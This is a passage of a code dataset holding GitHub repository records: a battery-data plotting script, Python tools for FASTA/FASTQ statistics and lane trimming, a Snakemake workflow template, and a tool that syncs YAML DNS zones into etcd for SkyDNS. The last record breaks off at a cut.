"text": "import matplotlib.pyplot as plt\nimport csv\n\nx0 = []\nx1 = []\nx2 = []\nx3 = []\ny0 = []\ny01 = []\ny1 = []\ny11 = []\ny2 = []\ny21 = []\ny3 = []\ny31 = []\n\n\nwith open('Data.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count += 1\n else:\n if row[2] == \"NMC\": #Filter for NMC Cells Only\n no = row[0]\n energy = row[18]\n if energy == \"\": #NaN Energy Data Fallback\n energy = 0\n else:\n energy = row[18]\n mass = row[13]\n energy = float(energy)\n mass = float(mass)\n eme = round(energy / mass, 2)\n anode = row[6]\n if anode == \"Al\":\n anode = 0.0106\n elif anode == \"Cu\":\n anode = 0.0175\n else:\n raise ValueError('Unindentified Value for Anode Foil Material on row: ' + line_count)\n active = round(mass - 0.0106 - anode, 4)\n em = round(energy / active, 4)\n if eme <= 10 and em <= 10 : #Energy Threshold\n line_count += 1\n else:\n if float(row[5]) == 50: #Filter for 50μm\n if row[7] == 'CuBFO':\n y2.append(eme)\n y21.append(em)\n x2.append(active)\n line_count += 1\n else:\n y0.append(eme)\n y01.append(em)\n x0.append(active)\n line_count += 1\n elif float(row[5]) == 25: #Filter for 25μm\n if row[7] == 'CuBFO':\n y3.append(eme)\n y31.append(em)\n x3.append(active)\n line_count += 1\n else:\n y1.append(eme)\n y11.append(em)\n x1.append(active)\n line_count += 1\n else:\n line_count += 1\n else:\n line_count += 1\n\nplt.scatter(x0, y0, color= \"red\", marker= \".\", label = \"50μm EME\")\nplt.scatter(x0, y01, color= \"red\", marker= \"x\", label = \"50μm EM\")\nplt.scatter(x1, y1, color= \"blue\", marker= \".\", label = \"25μm EME\")\nplt.scatter(x1, y11, color= \"blue\", marker= \"x\", label = \"25μm EM\")\nplt.scatter(x2, y2, color= \"orange\", marker= \".\", label = \"50μm CuBFO EME\")\nplt.scatter(x2, y21, color= \"orange\", marker= \"x\", label = \"50μm CuBFO EM\")\nplt.scatter(x3, y3, color= \"green\", marker= \".\", label = \"25μm CuBFO EME\")\nplt.scatter(x3, y31, color= \"green\", marker= \"x\", label = \"25μm CuBFO EM\")\nplt.xlabel('Active Material Mass')\nplt.ylabel('EM & EME')\nplt.title('EM, EME & Mass - @ Cycle 5 (NMC ONLY)')\nplt.legend()\nplt.show() "
}
] | 3 |
roobre/skydns-register
|
https://github.com/roobre/skydns-register
|
d0123a2ccd79ac1112b58ad6882c18bf3677b9e2
|
f6456d98921fe77b77cf7e736bd9c6c1792b3bc4
|
b2f6ff17c8d1d40ba8715ed810e043fb3ce33c4f
|
refs/heads/master
| 2023-01-31T11:46:20.602166 | 2020-12-14T20:47:48 | 2020-12-14T20:47:48 | 320,072,305 | 0 | 1 | null | 2020-12-09T20:31:53 | 2020-12-13T19:55:17 | 2020-12-14T20:47:49 |
Python
|
[
{
"alpha_fraction": 0.6442845463752747,
"alphanum_fraction": 0.6482813954353333,
"avg_line_length": 36.90909194946289,
"blob_id": "0d1c27a4b76308051c86509a4a2da9d34643b7dc",
"content_id": "b9006d8e05745b55f4834b2c02a647e63f12d51c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2502,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 66,
"path": "/register.py",
"repo_name": "roobre/skydns-register",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport logging\nimport os\nimport time\nimport argparse\nimport zonewalker\nimport recordparser\nimport etcdclient\n\n\ndef main():\n parser = argparse.ArgumentParser()\n argparse_add_environ(parser, '--zonedir', type=str, help='Directory to look for zones into')\n argparse_add_environ(parser, '--dry-run', action='store_true', default=False, help='Do not write anything to etcd')\n argparse_add_environ(parser, '--verbose', action='store_true', default=False, help='Roar out louder!')\n argparse_add_environ(parser, '--etcd-host', type=str, default='localhost', help='etcd host')\n argparse_add_environ(parser, '--etcd-port', type=int, default=2379, help='etcd port')\n argparse_add_environ(parser, '--etcd-prefix', type=str, default='external-dns', help='Prefix for etcd record keys')\n argparse_add_environ(parser, '--etcd-suffix', type=str, default='skyreg', help='Suffix for etcd record keys')\n argparse_add_environ(parser, '--loop-every', type=int, default=0, help='Loop every n seconds. Set to 0 to run once')\n argparse_add_environ(parser, '--owner-id', type=str, default='skyreg', help='ID of the owner in case more than one skydns-register is running')\n args, extra = parser.parse_known_args()\n\n if args.verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n\n while True:\n zw = zonewalker.Zonewalker()\n\n if args.zonedir:\n zw.load_dir(args.zonedir)\n\n for zonefile in extra:\n zw.load_file(zonefile)\n\n rp = recordparser.RecordParser(prefix=args.etcd_prefix, suffix=args.etcd_suffix)\n for z in zw.zones():\n rp.parse_zone(z)\n\n try:\n etcd = etcdclient.EtcdClient(args.etcd_host, int(args.etcd_port), args.dry_run, args.owner_id)\n except Exception as e:\n logging.error(f\"could not connect to etcd at {args.etcd_host}:{args.etcd_port}: {str(e)}\")\n exit(2)\n return\n\n try:\n etcd.update(rp.skydns_entries())\n except Exception as e:\n logging.error(f\"error updating etcd: {str(e)}\")\n exit(3)\n\n if args.loop_every == 0:\n break\n\n time.sleep(args.loop_every)\n\n\ndef argparse_add_environ(parser: argparse.ArgumentParser, name: str, default=None, **other):\n envdefault = os.environ.get(name.strip('-').upper().replace('-', '_'))\n parser.add_argument(name, default=(envdefault if envdefault else default), **other)\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5432742238044739,
"alphanum_fraction": 0.54535973072052,
"avg_line_length": 34.51852035522461,
"blob_id": "18213e67d1590790cba374e9d5b46bf195df45e7",
"content_id": "c71a832a1d44e95bd927e85dc9bfc8fe44eec1be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 959,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 27,
"path": "/etcdclient.py",
"repo_name": "roobre/skydns-register",
"src_encoding": "UTF-8",
"text": "import etcd3\nimport logging\nimport json\n\n\nclass EtcdClient:\n def __init__(self, host: str, port: int, dry_run: bool = False, owner_id: str = 'skyreg'):\n self._owner_id = owner_id\n self._dry_run = dry_run\n self._etcd = etcd3.client(host, port)\n if not self._dry_run:\n self._etcd.get('/')\n\n def update(self, records: dict):\n for val, meta in self._etcd.get_all():\n val = json.loads(val)\n if 'managed-by' in val and val['managed-by'] == self._owner_id and meta.key.decode() not in records:\n logging.info(f\"Deleting {meta.key.decode()}\")\n if not self._dry_run:\n self._etcd.delete(meta.key)\n\n for path in records:\n record = records[path]\n record['managed-by'] = self._owner_id\n logging.info(f\"Putting {path}\")\n if not self._dry_run:\n self._etcd.put(path, json.dumps(record))\n"
},
{
"alpha_fraction": 0.5128950476646423,
"alphanum_fraction": 0.513984739780426,
"avg_line_length": 30.284090042114258,
"blob_id": "d696e26bebb6cc6ac2f412970843c26bca53b67d",
"content_id": "fc74f710ca55cd90ba5efcd80f1dcb214d32a4de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2753,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 88,
"path": "/recordparser.py",
"repo_name": "roobre/skydns-register",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom typing import Dict\n\n\nclass RecordParser:\n def __init__(self, prefix: str = 'external-dns', suffix: str = 'skyreg'):\n self._records: Dict[Record] = {}\n self._prefix = prefix\n self._suffix = suffix\n\n def parse_zone(self, zone: dict):\n zonename = zone['zone']\n for rname in zone['records']:\n record = zone['records'][rname]\n\n if rname == '*':\n logging.warning(f\"Wilcard name ('*') is not supported in skydns, skipping\")\n continue\n\n key = self._dots_to_slashes(f\"{rname}.{zonename}\")\n self._records[key] = Record(rname, record)\n\n def skydns_entries(self) -> dict:\n skyentries = {}\n for key in self._records:\n record = self._records[key]\n try:\n skyrecord = record.skydns()\n skyrecord['targetstrip'] = 1\n skyentries[key] = skyrecord\n except Exception as e:\n logging.error(f\"error converting record '{key}', skipping: {str(e)}\")\n\n return skyentries\n\n def _dots_to_slashes(self, dotname: str) -> str:\n pieces = [ self._suffix ]\n\n pieces += dotname.strip('.').split('.')\n\n pieces.append(self._prefix)\n pieces += [ '' ]\n pieces.reverse()\n return '/'.join(pieces)\n\n\nclass Record:\n def __init__(self, name: str, entries: [dict, list]):\n if type(entries) != list:\n entries = [entries]\n\n self._entries = entries\n self._name = name\n\n \"\"\"\n Convert record to skydns format\n \"\"\"\n\n def skydns(self) -> dict:\n record = {}\n\n for entry in self._entries:\n if 'type' not in entry:\n logging.warning(f\"missing attribute 'type' for value in {self._name}, skipping\")\n continue\n\n if entry['type'] == 'MX':\n record['mail'] = True\n continue\n\n if 'value' not in entry:\n if 'values' in entry and type(entry['values']) == list and len(entry['values']) > 0:\n logging.info(f\"Using first entry of 'values' as value for '{self._name}'\")\n entry['value'] = entry['values'][0]\n else:\n logging.warning(f\"entry {self._name} lacks both 'value' and 'values[]', skipping\")\n continue\n\n if entry['type'] in ['A', 'AAAA', 'CNAME']:\n record['host'] = entry['value']\n elif entry['type'] == 'TXT':\n record['text'] = entry['value']\n\n if 'mail' in record and 'host' not in record:\n raise Exception(\"Record has MX type but not an address associated to it\")\n\n return record\n"
},
{
"alpha_fraction": 0.5785824060440063,
"alphanum_fraction": 0.579352855682373,
"avg_line_length": 28.5,
"blob_id": "5e5dce4d1be5629f424dd1442975de0d80ef835c",
"content_id": "c5c49b8d67491c6aa928095dc2c944c081d024e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1298,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 44,
"path": "/zonewalker.py",
"repo_name": "roobre/skydns-register",
"src_encoding": "UTF-8",
"text": "import yaml\nimport logging\nimport os\n\n\nclass Zonewalker:\n def __init__(self):\n self._zones = []\n\n def load_dir(self, path: str):\n for zonefile in os.scandir(path):\n if zonefile.is_file() and (zonefile.path.endswith('.yaml') or zonefile.path.endswith('.yml')):\n self.load_file(os.path.join(path, zonefile.name))\n\n def load_file(self, yaml_path: str):\n try:\n zone = self._yaml_load(yaml_path)\n except Exception as e:\n logging.warning(f\"skipping zone from {yaml_path}: {str(e)}\")\n return\n\n self._zones.append(zone)\n\n def zones(self) -> list:\n return self._zones\n\n @staticmethod\n def _yaml_load(filepath: str):\n file = open(filepath, mode='r')\n contents = yaml.safe_load(file)\n file.close()\n\n Zonewalker._validate(contents)\n\n return contents\n\n @staticmethod\n def _validate(zone: dict):\n if type(zone) != dict:\n raise Exception(\"zone is not a dict\")\n if 'zone' not in zone or type(zone['zone']) != str:\n raise Exception(\"zone.zone must exist and be a string\")\n if 'records' not in zone or type(zone['records']) != dict or len(zone['records']) <= 0:\n raise Exception(\"invalid record list\")\n"
},
{
"alpha_fraction": 0.734375,
"alphanum_fraction": 0.734375,
"avg_line_length": 17.285715103149414,
"blob_id": "f13039c30ecc5792ace9ee7ddab50299ddd0aece",
"content_id": "c500bd3e8149ba95f186487d458856e0f82aeb7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 128,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 7,
"path": "/Dockerfile",
"repo_name": "roobre/skydns-register",
"src_encoding": "UTF-8",
"text": "FROM python:slim\n\nRUN mkdir /app\nWORKDIR /app\nCOPY . /app\nRUN pip install -r requirements.txt\nENTRYPOINT [ \"/app/register.py\" ]\n"
}
] | 5 |
sagc-bioinformatics/snakemake_basic_template
|
https://github.com/sagc-bioinformatics/snakemake_basic_template
|
bc3ed9f8c19b56c4569794a4c4eb7ee1c0925958
|
7daea673755e9a176b9c2dceea12ae7477153c81
|
2091c4e00164f99e08a103b3f2ef84e49fd8b6ae
|
refs/heads/main
| 2023-07-08T18:31:13.785668 | 2021-08-18T04:34:08 | 2021-08-18T04:34:08 | 397,461,568 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7399328947067261,
"alphanum_fraction": 0.744966447353363,
"avg_line_length": 23.83333396911621,
"blob_id": "862255132e38a6531592a45a8f0844d1effc55a6",
"content_id": "4d721a3dff822a4416ef988bf45dbb0021fce8cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1192,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 48,
"path": "/README.md",
"repo_name": "sagc-bioinformatics/snakemake_basic_template",
"src_encoding": "UTF-8",
"text": "This repository is intended to be used as a Snakemake workflow template.\nIt provides all the necessary files and inline documentation to assist with generating your own customise workflow.\n\n# Running the Workflow\n\nTo run a Snakemake workflow, you will first need to have gone through the [Snakemake One-Time Setup] to install Snakemake in a conda environment.\n\n```bash\nSNAKEMAKE_VERSION='6.7.0'\n\n# Activate the conda environment to make Snakemake\n# available to you on the command line\nconda activate \\\n \"snakemake_${SNAKEMAKE_VERSION}\"\n\n# Run the workflow using the sahmri-hpc profile\n# in order to have jobs submitted to Slurm\nsnakemake \\\n --profile profiles/sahmri-hpc\n```\n\n# Snakemake One-Time Setup\n\n```bash\nSNAKEMAKE_VERSION='6.7.0'\n\n# Create an empty environment\nconda create \\\n --yes \\\n --name \"snakemake_v${SNAKEMAKE_VERSION}\"\n\n# Activate the new, empty environment\nconda activate \\\n \"snakemake_v${SNAKEMAKE_VERSION}\"\n\n# Install mamba - a faster/better version of the conda executable\nconda install \\\n --yes \\\n --channel conda-forge \\\n mamba\n\n# Install Snakemake\nmamba install \\\n --yes \\\n --channel bioconda \\\n --channel conda-forge \\\n snakemake=${SNAKEMAKE_VERSION}\n```\n"
},
{
"alpha_fraction": 0.6774193644523621,
"alphanum_fraction": 0.6774193644523621,
"avg_line_length": 30,
"blob_id": "64cfa2c717d5879c794cd4724fbd813eb3cff1c6",
"content_id": "51eaa00446992f9d6cf0a178c122081e069d61f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 1,
"path": "/rules/misc.smk",
"repo_name": "sagc-bioinformatics/snakemake_basic_template",
"src_encoding": "UTF-8",
"text": "# No rules defined here...yet?\n"
},
{
"alpha_fraction": 0.7149046659469604,
"alphanum_fraction": 0.7215482592582703,
"avg_line_length": 34.69072341918945,
"blob_id": "f334d58f121a09b65fdf06f287c84395af229e5c",
"content_id": "8469a65f0bce28d3f7db5113517326d279437e2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3462,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 97,
"path": "/Snakefile",
"repo_name": "sagc-bioinformatics/snakemake_basic_template",
"src_encoding": "UTF-8",
"text": "# General Snakemake top-matter\n\n# Snakemake can run a rule multiple times in order to collect benchmark information.\n# Set number of benchmarks to run to 1 - we can now use this variable in our rules.\nN_BENCHMARKS = 1\n\n# Jobs can be run inside a singularity container when using --use-singularity.\n# Specifying a container at the top-level provides the same image to all jobs.\nsingularity:\n\t\"docker://continuumio/miniconda3:4.10.3p0\"\n\n# Include other rules from other Snakefiles.\ninclude:\n\t\"rules/misc.smk\",\n\n# While rules should be run locally (e.g. head node) rather than being submitted as jobs.\nlocalrules:\n\tall,\n\n# Pseudorules to define convienient groups of target files.\n# By convention, the first should be called \"all\" as it will gets this alias anyway.\n# Simply specify all the required target files as the input to the pseudorule.\n# Use expand() as a convienient way to create all combinations of filenames.\nrule all:\n\tinput:\n\t\t# Explicitly defining EVERY target file quickly becomes a pain!\n\t\t'test/output/demo_minimal',\n\t\t# Use expand() as a convienient way to define many files with less reduncancy.\n\t\t# By default, expand() generates all combinations (products) of filenames if there is more than 1 replacement variable\n\t\texpand(\n\t\t\t'test/output/demo_{suffix}',\n\t\t\tsuffix = [\n\t\t\t\t'realistic',\n\t\t\t\t'wildcards',\n\t\t\t],\n\t\t),\n\n# Rules define, at a minimum, both input and output files and a way to make the output from the input.\n# Here we use the \"shell\" directive, but you could use \"run\" (Python code), \"script\" (external Python, R, Rmd, Julia and Rust), \"notebook\" for Jupyter notebook.\nrule demo_minimal:\n\tinput:\n\t\t'test/input/demo.in',\n\toutput:\n\t\t'test/output/demo_minimal',\n\tshell:\n\t\t\"\"\"\n\t\tsed -e '1~2d' < {input} > {output}\n\t\t\"\"\"\n\n# A more realistic example will specify a few more directives:\n# conda - A conda environment file detailing the tools required for this rule to run\n# resources - The job resources to request from Slurm. Supports \"mem_gb\", \"time_hr\" and \"threads\". They must be integer values.\n# threads - Number of threads available to the rule. This should match what is specified in the resources directive.\n# benchmark - Where to save benchmark stats and how many benchmarks to run\nrule demo_realistic:\n\tinput:\n\t\t'test/input/demo.in',\n\toutput:\n\t\t'test/output/demo_realistic',\n\tconda:\n\t\t'envs/demo.yaml',\n\tresources:\n\t\tmem_gb = 4,\n\t\ttime_hr = 8,\n\t\tthreads = 2,\n\tthreads:\n\t\t2,\n\tbenchmark:\n\t\trepeat(\"test/benchmarks/demo_realistic.txt\", N_BENCHMARKS),\n\tshell:\n\t\t\"\"\"\n\t\tsed -e '1~3d' < {input} > {output}\n\t\t\"\"\"\n# Rather than having a rule defined for EVERY possible output file, generalise the rules using wildcards.\n# Snakemake identifies the rule (or chain of rules) capable of making the requested file(s) by matching the filepath to the output directives of rules.\n# Exact matches take precedence and then wildcard (think regular expression) matches.\n# Wildcard values are defined via matching the output file(s) and \"reused\" in constructing identifying the input file(s).\n# All outout directives (output, log and benchmark) must specify ALL the same wildcards.\nrule demo_wildcards:\n\tinput:\n\t\t'test/input/{a_wildcard}.in',\n\toutput:\n\t\t'test/output/{a_wildcard}_wildcards',\n\tconda:\n\t\t'envs/demo.yaml',\n\tresources:\n\t\tmem_gb = 1,\n\t\ttime_hr = 1,\n\t\tthreads = 1,\n\tthreads:\n\t\t1,\n\tbenchmark:\n\t\trepeat(\"test/benchmarks/{a_wildcard}_wildcards.txt\", N_BENCHMARKS),\n\tshell:\n\t\t\"\"\"\n\t\tsed -e '1~4d' < {input} > {output}\n\t\t\"\"\"\n"
}
] | 3 |
fengqing-dong/codes
|
https://github.com/fengqing-dong/codes
|
6870827ae4ded3dc9cd0ee8a9d563ed8fb74177f
|
234e4ea3b176b97cb9a231fff25bb579e3074b48
|
7efef4a193dc18e4581e089f7501527937ae5056
|
refs/heads/master
| 2020-05-02T14:15:28.038655 | 2019-04-24T10:48:51 | 2019-04-24T10:48:51 | 178,005,274 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5490764379501343,
"alphanum_fraction": 0.5566823482513428,
"avg_line_length": 27.17346954345703,
"blob_id": "0035f4bbbae76f5e5aa784bdf4fd814350e994f4",
"content_id": "2226ea1f4bad75b56431cd4b35c53658af1e0a8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2805,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 98,
"path": "/python_codes/for_ngs.py",
"repo_name": "fengqing-dong/codes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding=utf-8\nfrom collections import Counter\nimport os\nimport argparse\nimport re\n\n\ndef get_arg():\n parser = argparse.ArgumentParser(description=\"%(prog)s 收录一些NGS分析小工具\")\n parser.add_argument('filename', metavar=\"filename\",nargs='+',help='输入(待处理)文件名')\n parser.add_argument('-o','--output', dest=\"output_filename\",help='输出文件名')\n \n args = parser.parse_args()\n print(args)\n return args\n\ndef count_chr_length(args):\n if not args.filename:\n raise IOError(\"No file was assigned!\")\n for file in args.filename:\n if not os.path.exists(file):\n raise IOError(\"{} don't exist in {}\".format(file, os.getcwd()))\n file = args.filename[0]\n chr_length = dict()\n with open(file, \"r\") as f:\n for line in f:\n if \">\" in line:\n chr_name = line.strip()[1:]\n chr_length[chr_name]=0\n else:\n chr_length[chr_name] += len(line)\n \n# print(chr_length)\n output_name = \"chr_length.txt\"\n if args.output_filename:\n output_name = args.output_filename[0]\n out = open(output_name,\"w\")\n for key, value in chr_length.items():\n out.write(\"{} => {}\\n\".format(key,value))\n out.close()\n return chr_length\n\ndef count_GC_content(args):\n file = args.filename[0]\n total_gc = Counter()\n chr_gc = dict()\n with open(file,\"r\") as f:\n for line in f:\n if \">\" in line:\n chr_name=line.strip()[1:]\n chr_gc[chr_name]=Counter()\n else:\n line=line.upper().strip()\n chr_gc[chr_name].update(line)\n total_gc.update(line)\n output_name = \"GC_content.txt\"\n if args.output_filename:\n output_name = args.output_filename[0]\n out = open(output_name,\"w\")\n out.write(\"chromose\\tA\\tT\\tG\\tC\\tpercent\\n\")\n for key, value in chr_gc.items():\n line = \"\"\n print(value)\n for base in 'ATGCN':\n line += \"\\t{}\".format(str(value[base]))\n gc_percent = (value[\"G\"]+value[\"C\"])/(value[\"A\"]+value[\"T\"]+value[\"G\"]+value[\"C\"])\n gc_percent = round(gc_percent*100,2)\n \n out.write(\"{}{}\\t{}\\n\".format(key,line,str(gc_percent)))\n total_gc_percent = round((total_gc[\"G\"] + total_gc[\"C\"])/(total_gc[\"A\"] + total_gc[\"T\"]+total_gc[\"G\"]+ total_gc[\"C\"])*100,2)\n line=\"\"\n for base in \"ATGCN\":\n line += \"\\t{}\".format(total_gc[base])\n out.write(\"total{}\\t{}\\n\".format(line, total_gc_percent))\n out.close()\n print(\"*\"*30)\n print(\"The total GC content:{}%\".format(total_gc_percent))\n print(\"*\"*30)\n\n\n\ndef file_split(args):\n file = args.filename[0]\n\n \n\n\n\n pass\n\n\n\n\n\nargs = get_arg()\n#count_chr_length(args)\ncount_GC_content(args)\n"
},
{
"alpha_fraction": 0.48669296503067017,
"alphanum_fraction": 0.4919911324977875,
"avg_line_length": 34.286956787109375,
"blob_id": "09adf9ec2f287b174f33393836b63c5878d251a1",
"content_id": "88c8940d7e8c653bb055bc89e6993506fbe2dd57",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8810,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 230,
"path": "/python_codes/filter_fy_lane.py",
"repo_name": "fengqing-dong/codes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding=utf-8\n\n\"\"\"\ntest\n\"\"\"\n\nfrom collections import Counter\nimport re\nimport argparse\nimport os\nimport sys\nimport time\n\n\ndef get_parse():\n parse = argparse.ArgumentParser(description=\"%(prog)s 对fastq文件中lane进行过滤和统计\")\n parse.add_argument(\"file\", help=\"输入文件\")\n parse.add_argument(\"-o\", \"--output\", dest=\"output\", action=\"append\", help=\"输出文件\")\n parse.add_argument(\n \"-l\", \"--lanes\", dest=\"lanes\", action=\"append\", help=\"待过滤的lane/tile编号\"\n )\n parse.add_argument(\n \"-t\", \"--threads\", dest=\"threads\", type=int, default=10, help=\"多进程处理\"\n )\n parse.add_argument(\n \"-s\", \"--site\", dest=\"site\", type=int, default=0, help=\"指定删除节点,在节点之前的序列全部截除\"\n )\n parse.add_argument(\n \"-r\", \"--row\", dest=\"row\", type=int, default=1024 * 1024, help=\"指定输出temp文件中行数\"\n )\n parse.add_argument(\n \"-d\", \"--deleted\", dest=\"deleted\", action=\"store_false\", help=\"删除整个lane/lane\"\n )\n arg = parse.parse_args()\n return arg\n\n\nclass SplitFiles:\n def __init__(self, args):\n self.filename = args.file\n self.output = args.output\n self.threads = args.threads\n self.size = args.row # 拆分后文件的行数\n self.temp_file_list = list() # 拆分后的文件名列表\n if not self.filename:\n raise FileNotFoundError(\"请指定待处理文件!\\n\")\n if not self.output:\n self.output = \"result\" + self.filename\n\n def split_file(self):\n \"\"\"\n 拆分大文件至小文件,可指定拆分个数\n \"\"\"\n if not os.path.exists(self.filename):\n raise FileNotFoundError(\"{}文件不存在,请检查正确路径或者命名!\\n\".format(self.filename))\n with open(self.filename) as f:\n self.lines = sum(1 for _ in f)\n self.split_file_num = self.lines / self.size\n print(\"{}总行数为:{:d}\".format(self.filename, self.lines))\n with open(self.filename) as f:\n store_num = 0\n file_num = 1\n _output_temp_name = \"temp{:03d}\".format(file_num)\n file_temp_output = open(_output_temp_name, \"w\")\n self.temp_file_list.append(_output_temp_name)\n for line in f:\n if store_num < self.size:\n file_temp_output.write(line)\n store_num += 1\n else:\n store_num = 1 # 下方写入一行,所以从1开始计算而不是0\n file_num += 1\n file_temp_output.close()\n _output_temp_name = \"temp{:03d}\".format(file_num)\n file_temp_output = open(_output_temp_name, \"w\")\n file_temp_output.write(line) # 在新闻文件中写入第一行,千万不能漏\n self.temp_file_list.append(_output_temp_name)\n file_temp_output.close()\n print(\"{}文件分割完成,共分割成{}个文件\".format(self.filename, len(self.temp_file_list)))\n return self.temp_file_list\n\n\nclass FileHandle(SplitFiles):\n def __init__(self, args):\n SplitFiles.__init__(self, args)\n if not self.temp_file_list:\n self.temp_file_list = [_ for _ in os.listdir() if \"temp\" in _]\n self.trime_file_list = list()\n self.deleted = args.deleted\n self.site = args.site\n self.lanes = args.lanes\n if not self.lanes:\n raise IndexError(\"请指定待过滤的tile/lane编号!\\n\")\n\n def file_handle_multi(self):\n \"\"\"\n 调度程序,多线程\n \"\"\"\n # TODO 多线程\n for files in self.temp_file_list:\n self.trim_within_file(files)\n self.merge_file()\n # todo function\n\n def trim_within_file(self, files):\n \"\"\"\n 对由SRA转换成FASTQ文件,按照tile编号进行裁减。\n self.deleted 参数控制是否删除整个lane|tile,默认不删除 \n \"\"\"\n print(\"正在裁剪{}\".format(files))\n if not os.path.exists(files):\n raise FileNotFoundError(\"{}文件不存在,请检查正确路径或者命名!\\n\".format(files))\n temp_trim_file = \"trim_{}\".format(files)\n self.trime_file_list.append(temp_trim_file)\n temp_trim_file = open(\"trim_{}\".format(files), \"w\")\n with open(files, \"r\") as f:\n for line in f:\n if line[0] == \"@\" and line.split(\":\")[-3] in self.lanes:\n # TODO 从尾部、或者两端裁减\n if self.deleted:\n if self.site == 0:\n print(\"并未执行裁减,请根据需要指定-s/--site 参数\")\n temp_trim_file.write(line)\n temp_trim_file.write(\n \" \" * (self.site - 1) + f.__next__()[self.site :]\n ) # Todo 检查site是否超过line长度\n temp_trim_file.write(f.__next__())\n temp_trim_file.write(f.__next__()[self.site :])\n else:\n f.__next__()\n f.__next__()\n f.__next__()\n else:\n temp_trim_file.write(line)\n temp_trim_file.write(f.__next__()) # Todo 检查site是否超过line长度\n temp_trim_file.write(f.__next__())\n temp_trim_file.write(f.__next__())\n temp_trim_file.close()\n os.remove(files)\n\n def merge_file(self):\n \"\"\"\n 合并文件\n \"\"\"\n result = open(\"trim_{}\".format(self.filename), \"w\")\n if not self.trime_file_list:\n self.trime_file_list = [_ for _ in os.listdir() if \"trim\" in _]\n print(\"正在合并文件,共{}文件待合并\".format(len(self.trime_file_list)))\n for _file in self.trime_file_list:\n print(\"正在合并{}\".format(_file))\n with open(_file, \"r\") as f:\n for line in f:\n result.write(line)\n os.remove(_file)\n result.close()\n print(\"文件合并完毕\")\n\n def count_chr_length(self):\n \"\"\"\n 计算每条染色体中ATCG的个数,并计算GC%\n \"\"\"\n file = self.filename\n if not os.path.exists(file):\n raise FileExistsError(\"{} don't exist in {}\".format(file, os.getcwd()))\n chr_length = dict()\n with open(file, \"r\") as f:\n for line in f:\n if \">\" in line:\n chr_name = line.strip()[1:]\n chr_length[chr_name] = 0\n else:\n chr_length[chr_name] += len(line)\n output_name = \"chr_length.txt\"\n out = open(output_name, \"w\")\n for key, value in chr_length.items():\n out.write(\"{} => {}\\n\".format(key, value))\n out.close()\n return chr_length\n\n def count_GC_content(self):\n \"\"\"\n 统计fasta|fastq文件中每个染色体|序列的GC%含量。\n \"\"\"\n total_gc = Counter()\n chr_gc = dict()\n with open(self.filename, \"r\") as f:\n for line in f:\n if \">\" in line:\n chr_name = line.strip()[1:]\n chr_gc[chr_name] = Counter()\n else:\n line = line.upper().strip()\n chr_gc[chr_name].update(line)\n total_gc.update(line)\n output_name = \"GC_content.txt\"\n out = open(output_name, \"w\")\n out.write(\"chromose\\tA\\tT\\tG\\tC\\tN\\tpercent\\n\")\n for key, value in chr_gc.items():\n line = \"\"\n print(value)\n for base in \"ATGCN\":\n line += \"\\t{}\".format(str(value[base]))\n gc_percent = (value[\"G\"] + value[\"C\"]) / (\n value[\"A\"] + value[\"T\"] + value[\"G\"] + value[\"C\"]\n )\n gc_percent = round(gc_percent * 100, 2)\n out.write(\"{}{}\\t{}\\n\".format(key, line, str(gc_percent)))\n total_gc_percent = round(\n (total_gc[\"G\"] + total_gc[\"C\"])\n / (total_gc[\"A\"] + total_gc[\"T\"] + total_gc[\"G\"] + total_gc[\"C\"])\n * 100,\n 2,\n )\n line = \"\"\n for base in \"ATGCN\":\n line += \"\\t{}\".format(total_gc[base])\n out.write(\"total{}\\t{}\\n\".format(line, total_gc_percent))\n out.close()\n print(\"*\" * 30)\n print(\"The total GC content:{}%\".format(total_gc_percent))\n print(\"*\" * 30)\n\n\nif __name__ == \"__main__\":\n args = get_parse()\n ss = FileHandle(args)\n ss.split_file()\n ss.file_handle_multi()\n# ss.merge_file()\n"
}
] | 2 |
ganesshkumar/hollowjack
|
https://github.com/ganesshkumar/hollowjack
|
3d01398b80da1d585ec0b84e9c4b96687141dbe4
|
f3a9e681f4051fd746cb4a616a513576ecfa5f37
|
2b68f36ae418e433bd0195c9f0cb5654b7fbfb0e
|
refs/heads/master
| 2020-12-25T14:13:30.887886 | 2016-07-09T16:50:41 | 2016-07-09T16:50:41 | 62,959,357 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5799151062965393,
"alphanum_fraction": 0.5968882441520691,
"avg_line_length": 24.709091186523438,
"blob_id": "3dd4b4567741e679a15a253f6a29ba39becc99fe",
"content_id": "ee8f34a0ce33ad56e7c7df4e5c4cfb701ea76bd8",
